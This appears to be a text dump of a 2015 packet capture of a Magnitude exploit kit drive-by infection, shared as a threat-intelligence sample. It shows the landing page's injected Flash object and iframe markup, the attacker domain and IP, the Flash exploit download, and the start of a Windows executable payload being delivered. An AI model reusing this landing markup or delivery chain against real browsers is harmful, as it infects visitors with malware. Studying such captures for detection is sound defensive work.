Magnitude EK Web Based Exploit Kit FLASH Vulnerability PCAP Converted Sample

June 22, 2015

2015-02-12 20:49:12.374714 IP 192.168.198.136.49482 > 46.166.182.101.80: Flags [P.], seq 1:749, ack 1, win 64240, length 748
E…'.@…c……..e.J.P….9.X"P…|…GET /?2654434052544748554a47524308414949414a430845494b hxxp/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: [redacted]
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: 49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in
2015-02-12 20:49:12.374852 IP 46.166.182.101.80 > 192.168.198.136.49482: Flags [.], ack 749, win 64240, length 0
E..(=}………e…..P.J9.X"….P………….
2015-02-12 20:49:22.076146 IP 46.166.182.101.80 > 192.168.198.136.49482: Flags [P.], seq 1:784, ack 749, win 64240, length 783
E..7@……….e…..P.J9.X"….P…….hxxp/1.1 200 OK
Date: Fri, 13 Feb 2015 00:48:50 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 581
Connection: close
Content-Type: text/html
<object type="application/x-shockwave-flash" data="hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/d8b7bd0646ae4b7344ff9e7df3b77f36" allowScriptAccess="always" width="410" height="53">
<param name="movie" value="hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/d8b7bd0646ae4b7344ff9e7df3b77f36"><param name="play" value="true">
</object>
<iframe src='hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/1db70f31658d04615bd2ac4751bf6c54' width=410 height=53></iframe>

2015-02-12 20:49:22.076574 IP 46.166.182.101.80 > 192.168.198.136.49482: Flags [FP.], seq 784, ack 749, win 64240, length 0
E..(@……….e…..P.J9.[1….P………….
2015-02-12 20:49:22.076692 IP 192.168.198.136.49482 > 46.166.182.101.80: Flags [F.], seq 749, ack 784, win 63457, length 0
E..('.@…f……..e.J.P….9.[1P………….
2015-02-12 20:49:22.076768 IP 192.168.198.136.49482 > 46.166.182.101.80: Flags [.], ack 785, win 63457, length 0
E..('.@…f……..e.J.P….9.[2P………….
2015-02-12 20:49:22.077227 IP 46.166.182.101.80 > 192.168.198.136.49482: Flags [.], ack 750, win 64239, length 0
E..(@……….e…..P.J9.[2….P………….
2015-02-12 20:49:22.130215 IP 192.168.198.136.49483 > 46.166.182.101.80: Flags [S], seq 3311956056, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4'.@…f……..e.K.P.hpX…… ..|…………..
2015-02-12 20:49:22.130411 IP 192.168.198.136.49484 > 46.166.182.101.80: Flags [S], seq 2998898249, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4'.@…f……..e.L.P…I…… ..3…………..
2015-02-12 20:49:22.266404 IP 46.166.182.101.80 > 192.168.198.136.49483: Flags [S.], seq 801925096, ack 3311956057, win 64240, options [mss 1460], length 0
E..,@……….e…..P.K/.g..hpY`………….
2015-02-12 20:49:22.266638 IP 192.168.198.136.49483 > 46.166.182.101.80: Flags [.], ack 1, win 64240, length 0
E..('.@…f……..e.K.P.hpY/.g.P………….
2015-02-12 20:49:22.267397 IP 192.168.198.136.49483 > 46.166.182.101.80: Flags [P.], seq 1:502, ack 1, win 64240, length 501
E…'.@…d……..e.K.P.hpY/.g.P…….GET /d8b7bd0646ae4b7344ff9e7df3b77f36 hxxp/1.1
Accept: */*
Referer: hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/?2654434052544748554a47524308414949414a430845494b
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in
Connection: Keep-Alive
2015-02-12 20:49:22.268047 IP 192.168.198.136.49484 > 46.166.182.101.80: Flags [P.], seq 1:690, ack 1, win 64240, length 689
E…'.@…d1…….e.L.P…J),s.P…dc..GET /1db70f31658d04615bd2ac4751bf6c54 hxxp/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: hxxp://49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in/?2654434052544748554a47524308414949414a430845494b
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 49.2a716.d1.19.3a59.86.e67ab.b0a6.375be0.qq151et969.buildscontrols[.]in
Connection: Keep-Alive
2015-02-12 20:49:22.268164 IP 46.166.182.101.80 > 192.168.198.136.49484: Flags [.], ack 690, win 64240, length 0
E..(@……….e…..P.L),s…..P….Z……..
2015-02-12 20:49:22.413671 IP 46.166.182.101.80 > 192.168.198.136.49484: Flags [P.], seq 1:1370, ack 690, win 64240, length 1369
E…A……(…e…..P.L),s…..P…B…hxxp/1.1 200 OK
Date: Fri, 13 Feb 2015 00:49:00 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 101668
Connection: close
Content-Type: text/html
2015-02-12 20:49:22.415757 IP 46.166.182.101.80 > 192.168.198.136.49484: Flags [P.], seq 11136:12505, ack 690, win 64240, length 1369
E…A…… …e…..P.L),.G….P…Q…
2015-02-12 20:49:22.415762 IP 46.166.182.101.80 > 192.168.198.136.49483: Flags [P.], seq 1:1370, ack 502, win 64240, length 1369
E…A……….e…..P.K/.g..hrNP…….hxxp/1.1 200 OK
Date: Fri, 13 Feb 2015 00:49:00 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 19658
Connection: close
Content-Type: application/x-shockwave-flash
2015-02-12 20:49:26.587638 IP 192.168.198.136.49486 > 46.166.182.101.80: Flags [P.], seq 1:287, ack 1, win 64240, length 286
E..F(.@…e_…….e.N.P…_W,..P…#…GET /?aba053bd1f478e9f58ba3a41492dca6c hxxp/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 46.166.182.101
Connection: Keep-Alive
2015-02-12 20:49:26.587689 IP 46.166.182.101.80 > 192.168.198.136.49486: Flags [.], ack 287, win 64240, length 0
E..(C[…..8…e…..P.NW,…..}P…V………
2015-02-12 20:49:26.736298 IP 46.166.182.101.80 > 192.168.198.136.49486: Flags [P.], seq 1:1370, ack 287, win 64240, length 1369
E…Cn………e…..P.NW,…..}P…j…hxxp/1.1 200 OK
Date: Fri, 13 Feb 2015 00:49:04 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 160768
Connection: close
Content-Type: text/html

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
